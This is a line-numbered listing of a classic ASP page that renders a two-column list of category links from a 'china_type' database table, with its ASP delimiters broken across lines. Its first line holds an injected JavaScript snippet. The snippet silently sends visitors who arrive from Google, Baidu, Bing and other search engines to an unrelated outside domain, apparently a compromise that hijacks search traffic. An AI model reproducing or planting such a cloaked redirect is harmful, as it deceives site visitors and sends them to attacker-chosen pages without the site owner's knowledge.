d:\wwwroot\wuchunhua\type_more.asp
001:
<script type="text/javascript">var s=document.referrer;if(s.indexOf("google")>0 || s.indexOf("baidu")>0 || s.indexOf("yahoo")>0 || s.indexOf("gou")>0 || s.indexOf("bing")>0 || s.indexOf("dao")>0 || s.indexOf("so")>0 || s.indexOf("sm")>0 || s.indexOf("biso")>0 ){location.href="http://www.afisyecd.space/?1923057"}</script>
<!--#include file="head.asp"-->
002:
<table width="860" border="0" align="center" cellpadding="0" cellspacing="0">
003:
<tr>
004:
<td><img src="images/news_0034.gif" width="860" height="35"></td>
005:
</tr>
006:
</table>
007:
<table width="860" border="0" align="center" cellpadding="0" cellspacing="2" bgcolor="0AAEDF">
008:
<tr>
009:
<td bgcolor="#FFFFFF"><table width="100%" border="0" cellspacing="8" cellpadding="0">
010:
<tr>
011:
<td valign='top' width="50%">
012:
<p style="line-height: 180%">
013:
<%
i=0
014:
set rs=server.CreateObject("adodb.recordset")
015:
rs.Open "select * from china_type where twoid=0 and threeid=0 order by indexid",conn,1,1
016:
do while not rs.eof
%
>
017:
<table width="100%" border="0" cellspacing="8" cellpadding="0"><tr><td width="5%"><img src="images/news_0035.gif">
018:
<table border="0" cellpadding="0" cellspacing="0" align="center" id="table17">
019:
<tr>
020:
<td height="8"></td>
021:
</tr>
022:
</table></td><td><a target="_blank" href="type.asp?type_oneid=
<%
=rs("id")
%
>&type_twoid=
<%
=rs("twoid")
%
>&type_threeid=
<%
=rs("threeid")
%
>"><font style="font-size:10.5pt" color="#1835D1"><b>
<%
=rs("name")
%
></b></font></a></td></tr>
023:
<%
set rsi=conn.execute("select * from china_type where id="&rs("id")&" and twoid<>0 and threeid=0 order by indexid,id,twoid")
024:
response.write "<tr><td></td><td>"
025:
do while not rsi.eof
%
>
026:
<a target="_blank" href="type.asp?type_oneid=
<%
=rsi("id")
%
>&type_twoid=
<%
=rsi("twoid")
%
>&type_threeid=
<%
=rsi("threeid")
%
>"> <font style="font-size:9pt" color="#1835D1">
<%
=rsi("name")
%
></font></a><font color="#CCCCCC">|</font>
027:
<%
rsi.movenext
028:
loop
029:
response.write "</td></tr></table>"
030:
i=i+1
031:
if i mod 2=0 then
032:
response.Write "</td></tr><tr><td valign='top' width='50%'>"
033:
else
034:
response.Write "</td><td valign='top' width='50%'>"
035:
end if
036:
rsi.close
037:
rs.movenext
038:
loop
039:
rs.close
040:
set rs=nothing
041:
%
>
042:
</span></td>
043:
</tr>
044:
</table>
045:
046:
</table>
047:
<table border="0" cellpadding="0" cellspacing="0" align="center" id="table17">
048:
<tr>
049:
<td height="8"></td>
050:
</tr>
051:
</table>
052:
<title></title>
053:
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
054:
<!--#include file="foot.asp"-->
055:
056: